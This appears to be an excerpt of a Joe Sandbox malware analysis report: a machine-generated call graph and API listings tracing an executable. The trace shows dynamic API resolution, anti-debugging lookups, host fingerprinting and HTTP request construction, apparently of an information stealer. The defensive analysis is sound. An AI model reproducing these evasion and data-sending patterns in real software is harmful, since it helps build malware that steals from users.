26644->26645 26646 434a60 2 API calls 26645->26646 26647 434169 26646->26647 26648 434a60 2 API calls 26647->26648 26649 43417f 26648->26649 26650 434a60 2 API calls 26649->26650 26651 434198 26650->26651 26652 434a60 2 API calls 26651->26652 26653 4341ae 26652->26653 26654 434a60 2 API calls 26653->26654 26655 4341c4 26654->26655 26656 434a60 2 API calls 26655->26656 26657 4341da 26656->26657 26658 434a60 2 API calls 26657->26658 26659 4341f0 26658->26659 26660 434a60 2 API calls 26659->26660 26661 434206 26660->26661 26662 434a60 2 API calls 26661->26662 26663 43421f 26662->26663 26664 434a60 2 API calls 26663->26664 26665 434235 26664->26665 26666 434a60 2 API calls 26665->26666 26667 43424b 26666->26667 26668 434a60 2 API calls 26667->26668 26669 434261 26668->26669 26670 434a60 2 API calls 26669->26670 26671 434277 26670->26671 26672 434a60 2 API calls 26671->26672 26673 43428d 26672->26673 26674 434a60 2 API calls 26673->26674 26675 4342a6 26674->26675 26676 434a60 2 API calls 26675->26676 26677 4342bc 26676->26677 26678 434a60 2 API calls 26677->26678 26679 4342d2 26678->26679 26680 434a60 2 API calls 26679->26680 26681 4342e8 26680->26681 26682 434a60 2 API calls 26681->26682 26683 4342fe 26682->26683 26684 434a60 2 API calls 26683->26684 26685 434314 26684->26685 26686 434a60 2 API calls 26685->26686 26687 43432d 26686->26687 26688 434a60 2 API calls 26687->26688 26689 434343 26688->26689 26690 434a60 2 API calls 26689->26690 26691 434359 26690->26691 26692 434a60 2 API calls 26691->26692 26693 43436f 26692->26693 26694 434a60 2 API calls 26693->26694 26695 434385 26694->26695 26696 434a60 2 API calls 26695->26696 26697 43439b 26696->26697 26698 434a60 2 API calls 26697->26698 26699 4343b4 26698->26699 26700 434a60 2 API calls 26699->26700 26701 4343ca 26700->26701 26702 434a60 2 API calls 26701->26702 26703 4343e0 26702->26703 26704 434a60 2 API calls 26703->26704 26705 4343f6 26704->26705 26706 434a60 2 API calls 26705->26706 26707 43440c 26706->26707 
26708 434a60 2 API calls 26707->26708 26709 434422 26708->26709 26710 434a60 2 API calls 26709->26710 26711 43443b 26710->26711 26712 434a60 2 API calls 26711->26712 26713 434451 26712->26713 26714 434a60 2 API calls 26713->26714 26715 434467 26714->26715 26716 434a60 2 API calls 26715->26716 26717 43447d 26716->26717 26718 434a60 2 API calls 26717->26718 26719 434493 26718->26719 26720 434a60 2 API calls 26719->26720 26721 4344a9 26720->26721 26722 434a60 2 API calls 26721->26722 26723 4344c2 26722->26723 26724 434a60 2 API calls 26723->26724 26725 4344d8 26724->26725 26726 434a60 2 API calls 26725->26726 26727 4344ee 26726->26727 26728 434a60 2 API calls 26727->26728 26729 434504 26728->26729 26730 434a60 2 API calls 26729->26730 26731 43451a 26730->26731 26732 434a60 2 API calls 26731->26732 26733 434530 26732->26733 26734 434a60 2 API calls 26733->26734 26735 434549 26734->26735 26736 434a60 2 API calls 26735->26736 26737 43455f 26736->26737 26738 434a60 2 API calls 26737->26738 26739 434575 26738->26739 26740 434a60 2 API calls 26739->26740 26741 43458b 26740->26741 26742 434a60 2 API calls 26741->26742 26743 4345a1 26742->26743 26744 434a60 2 API calls 26743->26744 26745 4345b7 26744->26745 26746 434a60 2 API calls 26745->26746 26747 4345d0 26746->26747 26748 434a60 2 API calls 26747->26748 26749 4345e6 26748->26749 26750 434a60 2 API calls 26749->26750 26751 4345fc 26750->26751 26752 434a60 2 API calls 26751->26752 26753 434612 26752->26753 26754 434a60 2 API calls 26753->26754 26755 434628 26754->26755 26756 434a60 2 API calls 26755->26756 26757 43463e 26756->26757 26758 434a60 2 API calls 26757->26758 26759 434657 26758->26759 26760 434a60 2 API calls 26759->26760 26761 43466d 26760->26761 26762 434a60 2 API calls 26761->26762 26763 434683 26762->26763 26764 434a60 2 API calls 26763->26764 26765 434699 26764->26765 26766 434a60 2 API calls 26765->26766 26767 4346af 26766->26767 26768 434a60 2 API calls 26767->26768 26769 4346c5 26768->26769 26770 434a60 2 
API calls 26769->26770 26771 4346de 26770->26771 26772 434a60 2 API calls 26771->26772 26773 4346f4 26772->26773 26774 434a60 2 API calls 26773->26774 26775 43470a 26774->26775 26776 434a60 2 API calls 26775->26776 26777 434720 26776->26777 26778 434a60 2 API calls 26777->26778 26779 434736 26778->26779 26780 434a60 2 API calls 26779->26780 26781 43474c 26780->26781 26782 434a60 2 API calls 26781->26782 26783 434765 26782->26783 26784 434a60 2 API calls 26783->26784 26785 43477b 26784->26785 26786 434a60 2 API calls 26785->26786 26787 434791 26786->26787 26788 434a60 2 API calls 26787->26788 26789 4347a7 26788->26789 26790 434a60 2 API calls 26789->26790 26791 4347bd 26790->26791 26792 434a60 2 API calls 26791->26792 26793 4347d3 26792->26793 26794 434a60 2 API calls 26793->26794 26795 4347ec 26794->26795 26796 434a60 2 API calls 26795->26796 26797 434802 26796->26797 26798 434a60 2 API calls 26797->26798 26799 434818 26798->26799 26800 434a60 2 API calls 26799->26800 26801 43482e 26800->26801 26802 434a60 2 API calls 26801->26802 26803 434844 26802->26803 26804 434a60 2 API calls 26803->26804 26805 43485a 26804->26805 26806 434a60 2 API calls 26805->26806 26807 434873 26806->26807 26808 434a60 2 API calls 26807->26808 26809 434889 26808->26809 26810 434a60 2 API calls 26809->26810 26811 43489f 26810->26811 26812 434a60 2 API calls 26811->26812 26813 4348b5 26812->26813 26814 434a60 2 API calls 26813->26814 26815 4348cb 26814->26815 26816 434a60 2 API calls 26815->26816 26817 4348e1 26816->26817 26818 434a60 2 API calls 26817->26818 26819 4348fa 26818->26819 26820 434a60 2 API calls 26819->26820 26821 434910 26820->26821 26822 434a60 2 API calls 26821->26822 26823 434926 26822->26823 26824 434a60 2 API calls 26823->26824 26825 43493c 26824->26825 26826 434a60 2 API calls 26825->26826 26827 434952 26826->26827 26828 434a60 2 API calls 26827->26828 26829 434968 26828->26829 26830 434a60 2 API calls 26829->26830 26831 434981 26830->26831 26832 434a60 2 API calls 
26831->26832 26833 434997 26832->26833 26834 434a60 2 API calls 26833->26834 26835 4349ad 26834->26835 26836 434a60 2 API calls 26835->26836 26837 4349c3 26836->26837 26838 434a60 2 API calls 26837->26838 26839 4349d9 26838->26839 26840 434a60 2 API calls 26839->26840 26841 4349ef 26840->26841 26842 434a60 2 API calls 26841->26842 26843 434a08 26842->26843 26844 434a60 2 API calls 26843->26844 26845 434a1e 26844->26845 26846 434a60 2 API calls 26845->26846 26847 434a34 26846->26847 26848 434a60 2 API calls 26847->26848 26849 434a4a 26848->26849 26850 4566e0 26849->26850 26851 4566ed 43 API calls 26850->26851 26852 456afe 8 API calls 26850->26852 26851->26852 26853 456b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26852->26853 26854 456c08 26852->26854 26853->26854 26855 456c15 8 API calls 26854->26855 26856 456cd2 26854->26856 26855->26856 26857 456d4f 26856->26857 26858 456cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26856->26858 26859 456d5c 6 API calls 26857->26859 26860 456de9 26857->26860 26858->26857 26859->26860 26861 456df6 12 API calls 26860->26861 26862 456f10 26860->26862 26861->26862 26863 456f8d 26862->26863 26864 456f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26862->26864 26865 456f96 GetProcAddress GetProcAddress 26863->26865 26866 456fc1 26863->26866 26864->26863 26865->26866 26867 456ff5 26866->26867 26868 456fca GetProcAddress GetProcAddress 26866->26868 26869 457002 10 API calls 26867->26869 26870 4570ed 26867->26870 26868->26867 26869->26870 26871 4570f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26870->26871 26872 457152 26870->26872 26871->26872 26873 45716e 26872->26873 26874 45715b GetProcAddress 26872->26874 26875 457177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26873->26875 26876 45051f 26873->26876 26874->26873 26875->26876 26877 431530 26876->26877 27186 431610 26877->27186 26879 43153b 26880 431555 
lstrcpy 26879->26880 26881 43155d 26879->26881 26880->26881 26882 431577 lstrcpy 26881->26882 26883 43157f 26881->26883 26882->26883 26884 431599 lstrcpy 26883->26884 26885 4315a1 26883->26885 26884->26885 26886 431605 26885->26886 26887 4315fd lstrcpy 26885->26887 26888 44f1b0 lstrlen 26886->26888 26887->26886 26889 44f1e4 26888->26889 26890 44f1f7 lstrlen 26889->26890 26891 44f1eb lstrcpy 26889->26891 26892 44f208 26890->26892 26891->26890 26893 44f20f lstrcpy 26892->26893 26894 44f21b lstrlen 26892->26894 26893->26894 26895 44f22c 26894->26895 26896 44f233 lstrcpy 26895->26896 26897 44f23f 26895->26897 26896->26897 26898 44f258 lstrcpy 26897->26898 26899 44f264 26897->26899 26898->26899 26900 44f286 lstrcpy 26899->26900 26901 44f292 26899->26901 26900->26901 26902 44f2ba lstrcpy 26901->26902 26903 44f2c6 26901->26903 26902->26903 26904 44f2ea lstrcpy 26903->26904 26954 44f300 26903->26954 26904->26954 26905 44f30c lstrlen 26905->26954 26906 44f4b9 lstrcpy 26906->26954 26907 44f3a1 lstrcpy 26907->26954 26908 44f3c5 lstrcpy 26908->26954 26909 44f4e8 lstrcpy 26969 44f4f0 26909->26969 26910 431530 8 API calls 26910->26969 26911 44ee90 28 API calls 26911->26954 26912 44f479 lstrcpy 26912->26954 26913 44f59c lstrcpy 26913->26969 26914 44f70f StrCmpCA 26919 44fe8e 26914->26919 26914->26954 26915 44f616 StrCmpCA 26915->26914 26915->26969 26916 44fa29 StrCmpCA 26926 44fe2b 26916->26926 26916->26954 26917 44f73e lstrlen 26917->26954 26918 44fd4d StrCmpCA 26923 44fd60 Sleep 26918->26923 26931 44fd75 26918->26931 26920 44fead lstrlen 26919->26920 26921 44fea5 lstrcpy 26919->26921 26925 44fec7 26920->26925 26921->26920 26922 44fa58 lstrlen 26922->26954 26923->26954 26924 44f64a lstrcpy 26924->26969 26934 44fee7 lstrlen 26925->26934 26937 44fedf lstrcpy 26925->26937 26927 44fe4a lstrlen 26926->26927 26929 44fe42 lstrcpy 26926->26929 26933 44fe64 26927->26933 26928 44f89e lstrcpy 26928->26954 26929->26927 26930 44fd94 lstrlen 26945 44fdae 26930->26945 26931->26930 26935 44fd8c 
lstrcpy 26931->26935 26932 44f76f lstrcpy 26932->26954 26939 44fdce lstrlen 26933->26939 26941 44fe7c lstrcpy 26933->26941 26946 44ff01 26934->26946 26935->26930 26936 44fbb8 lstrcpy 26936->26954 26937->26934 26938 44fa89 lstrcpy 26938->26954 26955 44fde8 26939->26955 26940 44f791 lstrcpy 26940->26954 26941->26939 26942 431530 8 API calls 26942->26954 26944 44f8cd lstrcpy 26944->26969 26945->26939 26950 44fdc6 lstrcpy 26945->26950 26947 44ff21 26946->26947 26952 44ff19 lstrcpy 26946->26952 26953 431610 4 API calls 26947->26953 26948 44f698 lstrcpy 26948->26969 26949 44faab lstrcpy 26949->26954 26950->26939 26951 44fbe7 lstrcpy 26951->26969 26952->26947 26972 44fe13 26953->26972 26954->26905 26954->26906 26954->26907 26954->26908 26954->26909 26954->26911 26954->26912 26954->26914 26954->26916 26954->26917 26954->26918 26954->26922 26954->26928 26954->26932 26954->26936 26954->26938 26954->26940 26954->26942 26954->26944 26954->26949 26954->26951 26960 44f7e2 lstrcpy 26954->26960 26963 44fafc lstrcpy 26954->26963 26954->26969 26956 44fe08 26955->26956 26958 44fe00 lstrcpy 26955->26958 26959 431610 4 API calls 26956->26959 26957 44efb0 35 API calls 26957->26969 26958->26956 26959->26972 26960->26954 26961 44f924 lstrcpy 26961->26969 26962 44f99e StrCmpCA 26962->26916 26962->26969 26963->26954 26964 44fc3e lstrcpy 26964->26969 26965 44fcb8 StrCmpCA 26965->26918 26965->26969 26966 44f9cb lstrcpy 26966->26969 26967 44fce9 lstrcpy 26967->26969 26968 44ee90 28 API calls 26968->26969 26969->26910 26969->26913 26969->26915 26969->26916 26969->26918 26969->26924 26969->26948 26969->26954 26969->26957 26969->26961 26969->26962 26969->26964 26969->26965 26969->26966 26969->26967 26969->26968 26970 44fa19 lstrcpy 26969->26970 26971 44fd3a lstrcpy 26969->26971 26970->26969 26971->26969 26972->25996 26974 452785 26973->26974 26975 45278c GetVolumeInformationA 26973->26975 26974->26975 26976 4527ec GetProcessHeap RtlAllocateHeap 26975->26976 26978 452826 wsprintfA 26976->26978 
26979 452822 26976->26979 26978->26979 27196 4571e0 26979->27196 26983 434c70 26982->26983 26984 434c85 26983->26984 26985 434c7d lstrcpy 26983->26985 27200 434bc0 26984->27200 26985->26984 26987 434c90 26988 434ccc lstrcpy 26987->26988 26989 434cd8 26987->26989 26988->26989 26990 434cff lstrcpy 26989->26990 26991 434d0b 26989->26991 26990->26991 26992 434d2f lstrcpy 26991->26992 26993 434d3b 26991->26993 26992->26993 26994 434d6d lstrcpy 26993->26994 26995 434d79 26993->26995 26994->26995 26996 434da0 lstrcpy 26995->26996 26997 434dac InternetOpenA StrCmpCA 26995->26997 26996->26997 26998 434de0 26997->26998 26999 4354b8 InternetCloseHandle CryptStringToBinaryA 26998->26999 27204 453e70 26998->27204 27001 4354e8 LocalAlloc 26999->27001 27017 4355d8 26999->27017 27002 4354ff CryptStringToBinaryA 27001->27002 27001->27017 27003 435517 LocalFree 27002->27003 27004 435529 lstrlen 27002->27004 27003->27017 27005 43553d 27004->27005 27007 435563 lstrlen 27005->27007 27008 435557 lstrcpy 27005->27008 27006 434dfa 27009 434e23 lstrcpy lstrcat 27006->27009 27010 434e38 27006->27010 27012 43557d 27007->27012 27008->27007 27009->27010 27011 434e5a lstrcpy 27010->27011 27013 434e62 27010->27013 27011->27013 27014 43558f lstrcpy lstrcat 27012->27014 27015 4355a2 27012->27015 27016 434e71 lstrlen 27013->27016 27014->27015 27018 4355d1 27015->27018 27020 4355c9 lstrcpy 27015->27020 27019 434e89 27016->27019 27017->26025 27018->27017 27021 434e95 lstrcpy lstrcat 27019->27021 27022 434eac 27019->27022 27020->27018 27021->27022 27023 434ed5 27022->27023 27024 434ecd lstrcpy 27022->27024 27025 434edc lstrlen 27023->27025 27024->27023 27026 434ef2 27025->27026 27027 434efe lstrcpy lstrcat 27026->27027 27028 434f15 27026->27028 27027->27028 27029 434f36 lstrcpy 27028->27029 27030 434f3e 27028->27030 27029->27030 27031 434f65 lstrcpy lstrcat 27030->27031 27032 434f7b 27030->27032 27031->27032 27033 434fa4 27032->27033 27034 434f9c lstrcpy 27032->27034 27035 434fab lstrlen 27033->27035 
27034->27033 27036 434fc1 27035->27036 27037 434fcd lstrcpy lstrcat 27036->27037 27038 434fe4 27036->27038 27037->27038 27039 43500d 27038->27039 27040 435005 lstrcpy 27038->27040 27041 435014 lstrlen 27039->27041 27040->27039 27042 43502a 27041->27042 27043 435036 lstrcpy lstrcat 27042->27043 27044 43504d 27042->27044 27043->27044 27045 435079 27044->27045 27046 435071 lstrcpy 27044->27046 27047 435080 lstrlen 27045->27047 27046->27045 27048 43509b 27047->27048 27049 4350ac lstrcpy lstrcat 27048->27049 27050 4350bc 27048->27050 27049->27050 27051 4350da lstrcpy lstrcat 27050->27051 27052 4350ed 27050->27052 27051->27052 27053 43510b lstrcpy 27052->27053 27054 435113 27052->27054 27053->27054 27055 435121 InternetConnectA 27054->27055 27055->26999 27056 435150 HttpOpenRequestA 27055->27056 27057 4354b1 InternetCloseHandle 27056->27057 27058 43518b 27056->27058 27057->26999 27211 457310 lstrlen 27058->27211 27062 4351a4 27219 4572c0 27062->27219 27065 457280 lstrcpy 27066 4351c0 27065->27066 27067 457310 3 API calls 27066->27067 27068 4351d5 27067->27068 27069 457280 lstrcpy 27068->27069 27070 4351de 27069->27070 27071 457310 3 API calls 27070->27071 27072 4351f4 27071->27072 27073 457280 lstrcpy 27072->27073 27074 4351fd 27073->27074 27075 457310 3 API calls 27074->27075 27076 435213 27075->27076 27077 457280 lstrcpy 27076->27077 27078 43521c 27077->27078 27079 457310 3 API calls 27078->27079 27080 435231 27079->27080 27081 457280 lstrcpy 27080->27081 27082 43523a 27081->27082 27083 4572c0 2 API calls 27082->27083 27084 43524d 27083->27084 27085 457280 lstrcpy 27084->27085 27086 435256 27085->27086 27087 457310 3 API calls 27086->27087 27088 43526b 27087->27088 27089 457280 lstrcpy 27088->27089 27090 435274 27089->27090 27091 457310 3 API calls 27090->27091 27092 435289 27091->27092 27093 457280 lstrcpy 27092->27093 27094 435292 27093->27094 27095 4572c0 2 API calls 27094->27095 27096 4352a5 27095->27096 27097 457280 lstrcpy 27096->27097 27098 4352ae 27097->27098 
27099 457310 3 API calls 27098->27099 27100 4352c3 27099->27100 27101 457280 lstrcpy 27100->27101 27102 4352cc 27101->27102 27103 457310 3 API calls 27102->27103 27104 4352e2 27103->27104 27105 457280 lstrcpy 27104->27105 27106 4352eb 27105->27106 27107 457310 3 API calls 27106->27107 27108 435301 27107->27108 27109 457280 lstrcpy 27108->27109 27110 43530a 27109->27110 27111 457310 3 API calls 27110->27111 27112 43531f 27111->27112 27113 457280 lstrcpy 27112->27113 27114 435328 27113->27114 27115 4572c0 2 API calls 27114->27115 27116 43533b 27115->27116 27117 457280 lstrcpy 27116->27117 27118 435344 27117->27118 27119 435370 lstrcpy 27118->27119 27120 43537c 27118->27120 27119->27120 27121 4572c0 2 API calls 27120->27121 27122 43538a 27121->27122 27123 4572c0 2 API calls 27122->27123 27124 435397 27123->27124 27125 457280 lstrcpy 27124->27125 27126 4353a1 27125->27126 27127 4353b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27126->27127 27128 43549c InternetCloseHandle 27127->27128 27132 4353f2 27127->27132 27130 4354ae 27128->27130 27129 4353fd lstrlen 27129->27132 27130->27057 27131 43542e lstrcpy lstrcat 27131->27132 27132->27128 27132->27129 27132->27131 27133 435473 27132->27133 27134 43546b lstrcpy 27132->27134 27135 43547a InternetReadFile 27133->27135 27134->27133 27135->27128 27135->27132 27137 448cc6 ExitProcess 27136->27137 27138 448ccd 27136->27138 27139 448ee2 27138->27139 27140 448d84 StrCmpCA 27138->27140 27141 448da4 StrCmpCA 27138->27141 27142 448d06 lstrlen 27138->27142 27143 448e6f StrCmpCA 27138->27143 27144 448e88 lstrlen 27138->27144 27145 448e56 StrCmpCA 27138->27145 27146 448d30 lstrlen 27138->27146 27147 448dbd StrCmpCA 27138->27147 27148 448ddd StrCmpCA 27138->27148 27149 448dfd StrCmpCA 27138->27149 27150 448e1d StrCmpCA 27138->27150 27151 448e3d StrCmpCA 27138->27151 27152 448d5a lstrlen 27138->27152 27153 448ebb lstrcpy 27138->27153 27139->26027 27140->27138 27141->27138 27142->27138 27143->27138 27144->27138 27145->27138 
27146->27138 27147->27138 27148->27138 27149->27138 27150->27138 27151->27138 27152->27138 27153->27138 27154->26033 27155->26035 27156->26041 27157->26043 27158->26049 27159->26051 27160->26057 27161->26061 27162->26067 27163->26069 27164->26073 27165->26087 27166->26091 27167->26090 27168->26086 27169->26090 27170->26106 27171->26093 27172->26094 27173->26099 27174->26102 27175->26108 27176->26110 27177->26117 27178->26123 27179->26144 27180->26148 27181->26147 27182->26143 27183->26147 27184->26157 27187 43161f 27186->27187 27188 43162b lstrcpy 27187->27188 27189 431633 27187->27189 27188->27189 27190 43164d lstrcpy 27189->27190 27191 431655 27189->27191 27190->27191 27192 43166f lstrcpy 27191->27192 27193 431677 27191->27193 27192->27193 27194 431699 27193->27194 27195 431691 lstrcpy 27193->27195 27194->26879 27195->27194 27197 4571e6 27196->27197 27198 452860 27197->27198 27199 4571fc lstrcpy 27197->27199 27198->26022 27199->27198 27201 434bd0 27200->27201 27201->27201 27202 434bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27201->27202 27203 434c41 27202->27203 27203->26987 27205 453e83 27204->27205 27206 453e9f lstrcpy 27205->27206 27207 453eab 27205->27207 27206->27207 27208 453ed5 GetSystemTime 27207->27208 27209 453ecd lstrcpy 27207->27209 27210 453ef3 27208->27210 27209->27208 27210->27006 27213 45732d 27211->27213 27212 43519b 27215 457280 27212->27215 27213->27212 27214 45733d lstrcpy lstrcat 27213->27214 27214->27212 27217 45728c 27215->27217 27216 4572b4 27216->27062 27217->27216 27218 4572ac lstrcpy 27217->27218 27218->27216 27221 4572dc 27219->27221 27220 4351b7 27220->27065 27221->27220 27222 4572ed lstrcpy lstrcat 27221->27222 27222->27220 27252 4531f0 GetSystemInfo wsprintfA 27229 438c79 malloc 27266 431b64 162 API calls 27278 43bbf9 90 API calls 27258 44f2f8 93 API calls 27236 44e0f9 140 API calls 27267 446b79 138 API calls 27237 452880 10 API calls 27238 454480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27239 453480 6 
API calls 27259 453280 7 API calls 27268 43b309 98 API calls 27240 448c88 16 API calls 27249 454e35 7 API calls 27269 459711 14 API calls __setmbcp 27231 452c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27279 43db99 673 API calls 27242 45749e memset malloc ctype 27243 442499 290 API calls 27280 448615 47 API calls 27244 4530a0 GetSystemPowerStatus 27253 4529a0 GetCurrentProcess IsWow64Process 27271 444b29 304 API calls 27281 4423a9 298 API calls 27250 453130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27282 44abb2 120 API calls 27257 43f639 144 API calls 27260 4316b9 200 API calls 27273 43bf39 177 API calls
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00434C7F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434CD2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D05
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D35
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D73
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00434DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: a9cca48351dd44cbd60a230368d95ca791f47a0fccc6b6132061471ee642aa53
                            • Instruction ID: 08a09a62b5bcb9963eab1400ba28ac24fe42f412a17923790aca84b1731f440d
                            • Opcode Fuzzy Hash: a9cca48351dd44cbd60a230368d95ca791f47a0fccc6b6132061471ee642aa53
                            • Instruction Fuzzy Hash: C2529071A002169FCB21EFB5DC45B9FB7B9AF48314F15602AF805A7251DB78EC41CBA8

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 456390-4563bd GetPEB 2126 4565c3-456623 LoadLibraryA * 5 2125->2126 2127 4563c3-4565be call 4562f0 GetProcAddress * 20 2125->2127 2128 456625-456633 GetProcAddress 2126->2128 2129 456638-45663f 2126->2129 2127->2126 2128->2129 2132 456641-456667 GetProcAddress * 2 2129->2132 2133 45666c-456673 2129->2133 2132->2133 2134 456675-456683 GetProcAddress 2133->2134 2135 456688-45668f 2133->2135 2134->2135 2137 4566a4-4566ab 2135->2137 2138 456691-45669f GetProcAddress 2135->2138 2139 4566d7-4566da 2137->2139 2140 4566ad-4566d2 GetProcAddress * 2 2137->2140 2138->2137 2140->2139
                            APIs
                            • GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
                            • GetProcAddress.KERNEL32(76210000,00FF1708), ref: 00456402
                            • GetProcAddress.KERNEL32(76210000,00FF1720), ref: 0045641A
                            • GetProcAddress.KERNEL32(76210000,00FF14F8), ref: 00456432
                            • GetProcAddress.KERNEL32(76210000,00FF93A0), ref: 0045644B
                            • GetProcAddress.KERNEL32(76210000,00FE62D8), ref: 00456463
                            • GetProcAddress.KERNEL32(76210000,00FE6358), ref: 0045647B
                            • GetProcAddress.KERNEL32(76210000,00FF1768), ref: 00456494
                            • GetProcAddress.KERNEL32(76210000,00FF16C0), ref: 004564AC
                            • GetProcAddress.KERNEL32(76210000,00FF1558), ref: 004564C4
                            • GetProcAddress.KERNEL32(76210000,00FF16D8), ref: 004564DD
                            • GetProcAddress.KERNEL32(76210000,00FE63D8), ref: 004564F5
                            • GetProcAddress.KERNEL32(76210000,00FF1738), ref: 0045650D
                            • GetProcAddress.KERNEL32(76210000,00FF1750), ref: 00456526
                            • GetProcAddress.KERNEL32(76210000,00FE6458), ref: 0045653E
                            • GetProcAddress.KERNEL32(76210000,00FF1780), ref: 00456556
                            • GetProcAddress.KERNEL32(76210000,00FF1798), ref: 0045656F
                            • GetProcAddress.KERNEL32(76210000,00FE6198), ref: 00456587
                            • GetProcAddress.KERNEL32(76210000,00FF18A0), ref: 0045659F
                            • GetProcAddress.KERNEL32(76210000,00FE62F8), ref: 004565B8
                            • LoadLibraryA.KERNEL32(00FF1888,?,?,?,00451C03), ref: 004565C9
                            • LoadLibraryA.KERNEL32(00FF1810,?,?,?,00451C03), ref: 004565DB
                            • LoadLibraryA.KERNEL32(00FF1828,?,?,?,00451C03), ref: 004565ED
                            • LoadLibraryA.KERNEL32(00FF1840,?,?,?,00451C03), ref: 004565FE
                            • LoadLibraryA.KERNEL32(00FF1858,?,?,?,00451C03), ref: 00456610
                            • GetProcAddress.KERNEL32(75B30000,00FF1870), ref: 0045662D
                            • GetProcAddress.KERNEL32(751E0000,00FF18B8), ref: 00456649
                            • GetProcAddress.KERNEL32(751E0000,00FF17F8), ref: 00456661
                            • GetProcAddress.KERNEL32(76910000,00FF9708), ref: 0045667D
                            • GetProcAddress.KERNEL32(75670000,00FE6318), ref: 00456699
                            • GetProcAddress.KERNEL32(77310000,00FF9310), ref: 004566B5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004566CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 004566C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 9094ac6d500926738430b8e1cc0ed2c03d796947df22dee9bb744fbc2c1fd837
                            • Instruction ID: 2be699da6649eccfd68941b8a8b360b4905830b98d09ee35ab6895ed5ffa7e18
